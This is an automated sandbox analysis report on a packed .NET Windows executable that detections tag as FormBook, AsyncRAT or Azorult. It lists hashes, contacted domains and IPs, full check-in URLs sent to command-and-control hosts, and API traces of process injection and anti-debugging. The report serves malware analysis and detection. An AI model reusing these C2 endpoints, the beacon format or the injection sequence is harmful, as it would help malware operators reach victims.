Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 22, 2021, 9:44 a.m.	Sept. 22, 2021, 9:49 a.m.

Size	823.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`571fbd383fdd865a8232b66a32fcdea1`
SHA256	`be2ed31f85df8e65c76d1fd87ceb62a6381c0c5244eca15349bb0976052c2695`
CRC32	`CB1F2D13`
ssdeep	`12288:90A+smtiK5oUZzzz1c9GK1z1t8CyNAUNyWIqTIGQK:+Al+Fogc9vx1edLI9ZK`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
1548
- vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
  1904

Name	Response	Post-Analysis Lookup
www.gofirstclasstransportation.com	A 34.102.136.180 CNAME gofirstclasstransportation.com	34.102.136.180
www.rogerbennettdirect.com	A 45.38.95.23	45.38.95.23
www.hbo9x.com	A 198.54.117.218 A 198.54.117.216 A 198.54.117.217 CNAME parkingpage.namecheap.com A 198.54.117.215 A 198.54.117.212 A 198.54.117.210 A 198.54.117.211	198.54.117.217
www.cadylovesphil.com	A 184.168.131.241 CNAME cadylovesphil.com	184.168.131.241
www.fixnds.net	A 45.91.203.242	45.91.203.242
www.adorotudoisso.club	A 208.113.216.170	208.113.216.170
www.yyoutlets.com	A 104.16.199.133 CNAME 75412.cdn-ent-us01.ymcart.net	104.16.199.133
www.exsalon.com	CNAME HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com A 3.223.115.185	3.223.115.185
www.melisjewelryoutlet.com	A 35.82.7.11	35.82.7.11

IP Address	Status	Action
104.16.199.133	Active	Moloch
164.124.101.2	Active	Moloch
184.168.131.241	Active	Moloch
198.54.117.212	Active	Moloch
208.113.216.170	Active	Moloch
3.223.115.185	Active	Moloch
34.102.136.180	Active	Moloch
35.82.7.11	Active	Moloch
45.38.95.23	Active	Moloch
45.91.203.242	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49171 -> 184.168.131.241:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49171 -> 184.168.131.241:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49171 -> 184.168.131.241:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49169 -> 104.16.199.133:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49174 -> 35.82.7.11:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49169 -> 104.16.199.133:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49174 -> 35.82.7.11:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49174 -> 35.82.7.11:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49169 -> 104.16.199.133:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49172 -> 208.113.216.170:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49172 -> 208.113.216.170:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49172 -> 208.113.216.170:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49175 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49175 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49175 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49170 -> 3.223.115.185:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49170 -> 3.223.115.185:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49170 -> 3.223.115.185:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49167 -> 45.91.203.242:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49168 -> 45.38.95.23:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49167 -> 45.91.203.242:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49168 -> 45.38.95.23:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49167 -> 45.91.203.242:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49168 -> 45.38.95.23:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49173 -> 198.54.117.212:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49173 -> 198.54.117.212:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49173 -> 198.54.117.212:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 22, 2021, 9:44 a.m.			0	0
IsDebuggerPresent Sept. 22, 2021, 9:44 a.m.			0	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 22, 2021, 9:44 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.sdata

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (9 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.fixnds.net/n90q/?TjPx=P6KHl7TAGZAH71a4RnFQbUY9wI712ZxOLEoxdKJtbTI+a932MHV87nmrVKQgNeA2xOLZZdND&6l=mnSl
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.rogerbennettdirect.com/n90q/?TjPx=jjoFFvlqTx20XcgYMQ4XkTqs/me3vbqvtySxBe6GswElSHbgnA1OjDpMmx0BBxbFFt1y++tp&6l=mnSl
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.yyoutlets.com/n90q/?TjPx=C8aqPgrbrEZnqb9rrq1oEiWl0ZHCdquyaSR6E3K+XYj+LRrgfi5jsiI15JZ5hMnZiQ0ipQzI&6l=mnSl
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.exsalon.com/n90q/?TjPx=EWb7O5uBPUrKCxYatUDuT7v/S66I5c1eO1NheRiQPi6D0MQzxHiFURYLxG1IV//P9S0W5zX1&6l=mnSl
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.cadylovesphil.com/n90q/?TjPx=PaCWC483jJ1HtEcfQf62PsMYoCFYOsO8vjZT/E/YBK1tRvRehhDd7ldpB+xgDE+kOptxT42i&6l=mnSl
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.adorotudoisso.club/n90q/?TjPx=+AznKtSaeUwG4Xhx64dkxKeTbLa++kdbf8CsCGDIfyM3i3hWyBe26u1HjGAigACJ/I2g9jsl&6l=mnSl
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.hbo9x.com/n90q/?TjPx=VuCFI60C2Fa7BRxontB00GmI3hvNk9tk8ncjsg6qmPVslE9ClHmpoI5ZTylurzZorUZRxbZS&6l=mnSl
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.melisjewelryoutlet.com/n90q/?TjPx=IWUWHJdqOUXlXVbqgsytsBCjtgFzXL9PVTKzOkAVbq3Wshw07ptXs3J1aper+w7Ppoi+2UWd&6l=mnSl
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.gofirstclasstransportation.com/n90q/?TjPx=0cADqPZotqwvqOMSx7rwGQPvTd92CQ4aGVB1mEVI6ZXtvSXOsayYXTl19amwUpnq95YPp+92&6l=mnSl

Performs some HTTP requests (9 events)

request	GET http://www.fixnds.net/n90q/?TjPx=P6KHl7TAGZAH71a4RnFQbUY9wI712ZxOLEoxdKJtbTI+a932MHV87nmrVKQgNeA2xOLZZdND&6l=mnSl
request	GET http://www.rogerbennettdirect.com/n90q/?TjPx=jjoFFvlqTx20XcgYMQ4XkTqs/me3vbqvtySxBe6GswElSHbgnA1OjDpMmx0BBxbFFt1y++tp&6l=mnSl
request	GET http://www.yyoutlets.com/n90q/?TjPx=C8aqPgrbrEZnqb9rrq1oEiWl0ZHCdquyaSR6E3K+XYj+LRrgfi5jsiI15JZ5hMnZiQ0ipQzI&6l=mnSl
request	GET http://www.exsalon.com/n90q/?TjPx=EWb7O5uBPUrKCxYatUDuT7v/S66I5c1eO1NheRiQPi6D0MQzxHiFURYLxG1IV//P9S0W5zX1&6l=mnSl
request	GET http://www.cadylovesphil.com/n90q/?TjPx=PaCWC483jJ1HtEcfQf62PsMYoCFYOsO8vjZT/E/YBK1tRvRehhDd7ldpB+xgDE+kOptxT42i&6l=mnSl
request	GET http://www.adorotudoisso.club/n90q/?TjPx=+AznKtSaeUwG4Xhx64dkxKeTbLa++kdbf8CsCGDIfyM3i3hWyBe26u1HjGAigACJ/I2g9jsl&6l=mnSl
request	GET http://www.hbo9x.com/n90q/?TjPx=VuCFI60C2Fa7BRxontB00GmI3hvNk9tk8ncjsg6qmPVslE9ClHmpoI5ZTylurzZorUZRxbZS&6l=mnSl
request	GET http://www.melisjewelryoutlet.com/n90q/?TjPx=IWUWHJdqOUXlXVbqgsytsBCjtgFzXL9PVTKzOkAVbq3Wshw07ptXs3J1aper+w7Ppoi+2UWd&6l=mnSl
request	GET http://www.gofirstclasstransportation.com/n90q/?TjPx=0cADqPZotqwvqOMSx7rwGQPvTd92CQ4aGVB1mEVI6ZXtvSXOsayYXTl19amwUpnq95YPp+92&6l=mnSl

Allocates read-write-execute memory (usually to unpack itself) (45 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00680000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x731a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x731a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c10000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00422000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0042a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00447000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70692000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00446000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043cf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:44 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c25000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c26000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c27000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c2d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2021, 9:47 a.m.	process_identifier: 1904 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0009f000', u'virtual_address': u'0x00002000', u'entropy': 7.746204011067318, u'name': u'.text', u'virtual_size': u'0x0009eeb4'}

entropy

7.74620401107

description

A section with a high entropy has been found

entropy

0.773722627737

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 22, 2021, 9:47 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 22, 2021, 9:45 a.m.	process_identifier: 1904 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000025c	1	0	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 22, 2021, 9:45 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPEL¼öSà \|Ô@@.text{\| ` base_address: 0x00400000 process_identifier: 1904 process_handle: 0x0000025c	1	1	0
WriteProcessMemory Sept. 22, 2021, 9:45 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1904 process_handle: 0x0000025c	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 22, 2021, 9:45 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPEL¼öSà \|Ô@@.text{\| ` base_address: 0x00400000 process_identifier: 1904 process_handle: 0x0000025c	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1548 called NtSetContextThread to modify thread in remote process 1904
NtSetContextThread Sept. 22, 2021, 9:45 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4314240 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000254 process_identifier: 1904	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1548 resumed a thread in remote process 1904
NtResumeThread Sept. 22, 2021, 9:45 a.m.	thread_handle: 0x00000254 suspend_count: 1 process_identifier: 1904	1	0	0

Executed a process and injected code into it, probably while unpacking (11 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 22, 2021, 9:44 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1548	1	0
NtResumeThread Sept. 22, 2021, 9:44 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 1548	1	0
NtResumeThread Sept. 22, 2021, 9:44 a.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 1548	1	0
CreateProcessInternalW Sept. 22, 2021, 9:45 a.m.	thread_identifier: 2212 thread_handle: 0x00000254 process_identifier: 1904 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000025c	1	1
NtGetContextThread Sept. 22, 2021, 9:45 a.m.	thread_handle: 0x00000254	1	0
